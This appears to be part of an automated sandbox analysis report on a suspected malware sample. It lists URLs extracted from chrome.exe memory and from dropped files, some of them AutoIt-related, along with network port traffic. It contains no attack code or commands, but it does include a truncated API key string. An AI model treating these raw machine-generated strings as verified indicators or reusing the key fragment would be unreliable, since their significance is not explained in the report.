    Source: chrome.exe, 00000010.00000002.2725257801.000078C400104000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2726601425.000078C40039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2727760443.000078C400702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
    Source: chrome.exe, 00000010.00000002.2726971757.000078C400528000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2733079553.000078C400EF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
    Source: chrome.exe, 00000010.00000002.2729233845.000078C400978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2726865760.000078C4004D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2728286701.000078C4007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2733642541.000078C400FF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
    Source: chrome.exe, 00000010.00000002.2729233845.000078C400978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacyM
    Source: chrome.exe, 00000010.00000002.2733642541.000078C400FF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacyf
    Source: chrome.exe, 00000010.00000002.2726865760.000078C4004D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2728286701.000078C4007B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
    Source: chrome.exe, 00000010.00000003.2686970809.000078C40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
    Source: chrome.exe, 00000010.00000002.2733642541.000078C400FF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
    Source: chrome.exe, 00000010.00000002.2729512501.000078C400A23000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2729480786.000078C400A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
    Source: chrome.exe, 00000010.00000002.2725770050.000078C4001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
    Source: chrome.exe, 00000010.00000002.2725847154.000078C40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
    Source: chrome.exe, 00000010.00000002.2744123721.000078C401CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2696757712.000078C401344000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2693773778.000078C401CE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
    Source: chrome.exe, 00000010.00000002.2727934402.000078C400730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
    Source: chrome.exe, 00000010.00000002.2744123721.000078C401CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2696757712.000078C401344000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2693773778.000078C401CE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
    Source: chrome.exe, 00000010.00000002.2744123721.000078C401CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2696757712.000078C401344000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2693773778.000078C401CE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
    Source: chrome.exe, 00000010.00000002.2744123721.000078C401CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2696757712.000078C401344000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2693773778.000078C401CE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?prid=19044659
    Source: chrome.exe, 00000010.00000002.2732748395.000078C400E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2656797255.000078C400E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2732865240.000078C400EA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2697082828.000078C4019C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2732557877.000078C400E20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2732830918.000078C400E94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
    Source: chrome.exe, 00000010.00000002.2732748395.000078C400E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2656797255.000078C400E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2732865240.000078C400EA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2732896752.000078C400EAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2697082828.000078C4019C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2732557877.000078C400E20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2655261578.000078C400A5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2732830918.000078C400E94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
    Source: chrome.exe, 00000010.00000002.2732748395.000078C400E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2656797255.000078C400E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2732557877.000078C400E20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2732830918.000078C400E94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
    Source: chrome.exe, 00000010.00000002.2726202059.000078C4002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2732748395.000078C400E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2656797255.000078C400E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2732865240.000078C400EA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2732557877.000078C400E20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2655261578.000078C400A5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2732830918.000078C400E94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
    Source: chrome.exe, 00000010.00000002.2726202059.000078C4002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2732748395.000078C400E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2656797255.000078C400E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2732830918.000078C400E94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
    Source: chrome.exe, 00000010.00000002.2732748395.000078C400E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2656797255.000078C400E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2732865240.000078C400EA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2697082828.000078C4019C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2732557877.000078C400E20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2655261578.000078C400A5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2732830918.000078C400E94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
    Source: chrome.exe, 00000010.00000002.2732748395.000078C400E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2656797255.000078C400E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2732865240.000078C400EA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2732557877.000078C400E20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2655261578.000078C400A5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2732830918.000078C400E94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
    Source: chrome.exe, 00000010.00000002.2732748395.000078C400E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2656797255.000078C400E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2732865240.000078C400EA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2697082828.000078C4019C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2732557877.000078C400E20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2655261578.000078C400A5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2732830918.000078C400E94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
    Source: chrome.exe, 00000010.00000002.2726901356.000078C4004F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
    Source: chrome.exe, 00000010.00000002.2729512501.000078C400A23000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2729480786.000078C400A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
    Source: chrome.exe, 00000010.00000003.2661381988.000078C4010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661266172.000078C40040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661523381.000078C40120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
    Source: chrome.exe, 00000010.00000002.2729480786.000078C400A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
    Source: chrome.exe, 00000010.00000003.2686970809.000078C40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
    Source: chrome.exe, 00000010.00000003.2686970809.000078C40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
    Source: chrome.exe, 00000010.00000003.2686970809.000078C40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
    Source: chrome.exe, 00000010.00000003.2686970809.000078C40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
    Source: chrome.exe, 00000010.00000003.2686970809.000078C40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
    Source: chrome.exe, 00000010.00000002.2724958067.000078C40009C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
    Source: chrome.exe, 00000010.00000002.2725257801.000078C400104000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
    Source: chrome.exe, 00000010.00000002.2725770050.000078C4001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
    Source: chrome.exe, 00000010.00000003.2686970809.000078C40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
    Source: chrome.exe, 00000010.00000003.2686970809.000078C40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
    Source: chrome.exe, 00000010.00000002.2728535696.000078C40080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2726901356.000078C4004F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2728611172.000078C400824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2731250474.000078C400CB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
    Source: chrome.exe, 00000010.00000002.2728535696.000078C40080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2726901356.000078C4004F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2731250474.000078C400CB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
    Source: chrome.exe, 00000010.00000002.2727760443.000078C4006FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
    Source: chrome.exe, 00000010.00000002.2726754686.000078C400464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
    Source: HDBAI5.10.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
    Source: HDBAI5.10.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
    Source: HDBAI5.10.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
    Source: HDBAI5.10.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
    Source: chrome.exe, 00000010.00000002.2730111087.000078C400A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
    Source: chrome.exe, 00000010.00000002.2725770050.000078C4001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
    Source: 9R1D2D.10.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
    Source: Suicide.com.1.dr, Speak.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, KFUAIW.10.drString found in binary or memory: https://www.ecosia.org/newtab/
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
    Source: 9R1D2D.10.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
    Source: Speak.0.drString found in binary or memory: https://www.globalsign.com/repository/0
    Source: Suicide.com.1.dr, Speak.0.drString found in binary or memory: https://www.globalsign.com/repository/06
    Source: chrome.exe, 00000010.00000002.2729103898.000078C40094C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
    Source: chrome.exe, 00000010.00000002.2727760443.000078C4006FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: chrome.exe, 00000010.00000003.2656940206.000078C400F40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2727934402.000078C400730000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2731467868.000078C400D18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2729512501.000078C400A23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
    Source: chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2728659384.000078C400844000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/Char
    Source: chrome.exe, 00000010.00000003.2693773778.000078C401CE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/_/og/promos/
    Source: chrome.exe, 00000010.00000002.2731250474.000078C400CB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
    Source: chrome.exe, 00000010.00000002.2733598800.000078C400FE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2693388565.000078C400FE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_promos
    Source: chrome.exe, 00000010.00000003.2686970809.000078C40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
    Source: chrome.exe, 00000010.00000003.2686970809.000078C40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
    Source: chrome.exe, 00000010.00000002.2729296549.000078C40098C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2733175675.000078C400F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2725770050.000078C4001D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2728770316.000078C4008B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
    Source: chrome.exe, 00000010.00000002.2729296549.000078C40098C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2733175675.000078C400F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2725770050.000078C4001D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2728770316.000078C4008B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/gs
    Source: chrome.exe, 00000010.00000002.2727481861.000078C40061C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2728286701.000078C4007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2726971757.000078C400528000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2732964975.000078C400EC4000.00000004.00000800.00020000.00000000.sdmp, KFUAIW.10.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
    Source: chrome.exe, 00000010.00000002.2728286701.000078C4007B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoenterInsights
    Source: chrome.exe, 00000010.00000002.2726754686.000078C400464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
    Source: chrome.exe, 00000010.00000002.2744123721.000078C401CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2696757712.000078C401344000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2693773778.000078C401CE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
    Source: chrome.exe, 00000010.00000003.2686970809.000078C40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
    Source: chrome.exe, 00000010.00000003.2661523381.000078C40120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
    Source: chrome.exe, 00000010.00000002.2726901356.000078C4004F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
    Source: chrome.exe, 00000010.00000002.2726901356.000078C4004F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submitx
    Source: chrome.exe, 00000010.00000002.2730182379.000078C400A88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/undo
    Source: chrome.exe, 00000010.00000003.2693773778.000078C401CE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/url?q=https://google.com/chrome/safety%3Fbrand%3DKFKH%26utm_source%3Dweb%26ut
    Source: chrome.exe, 00000010.00000002.2727760443.000078C4006FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
    Source: chrome.exe, 00000010.00000002.2724689572.000078C40000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
    Source: chrome.exe, 00000010.00000003.2686970809.000078C40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
    Source: chrome.exe, 00000010.00000003.2690086393.000078C4015AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2690031645.000078C4015A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
    Source: chrome.exe, 00000010.00000003.2686970809.000078C40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
    Source: chrome.exe, 00000010.00000003.2686970809.000078C40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
    Source: chrome.exe, 00000010.00000002.2725847154.000078C40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
    Source: chrome.exe, 00000010.00000002.2725847154.000078C40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
    Source: chrome.exe, 00000010.00000002.2725847154.000078C40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
    Source: chrome.exe, 00000010.00000003.2661229181.000078C400C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2656474444.000078C400C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2725847154.000078C40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
    Source: chrome.exe, 00000010.00000002.2729103898.000078C40094C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
    Source: chrome.exe, 00000010.00000002.2729103898.000078C40094C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
    Source: chrome.exe, 00000010.00000002.2726901356.000078C4004F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
    Source: chrome.exe, 00000010.00000003.2693523334.000078C401D10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
    Source: chrome.exe, 00000010.00000003.2693825427.000078C401CD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2693495369.000078C401D08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2695268421.000078C401CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2697801373.000078C401D28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2696841004.000078C401C60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2696876426.000078C401C7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2744123721.000078C401CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2693523334.000078C401D10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
    Source: chrome.exe, 00000010.00000002.2729480786.000078C400A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.b6tg1FFzATM.2019.O/rt=j/m=q_d
    Source: chrome.exe, 00000010.00000002.2744123721.000078C401CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2696757712.000078C401344000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2693773778.000078C401CE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
    Source: chrome.exe, 00000010.00000002.2727760443.000078C400702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
    Source: chrome.exe, 00000010.00000002.2727760443.000078C400702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
    Source: chrome.exe, 00000010.00000002.2727760443.000078C400702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
    Source: chrome.exe, 00000010.00000002.2726202059.000078C4002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2727760443.000078C400702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
    Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
    Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
    Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
    Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
    Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
    Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
    Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
    Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
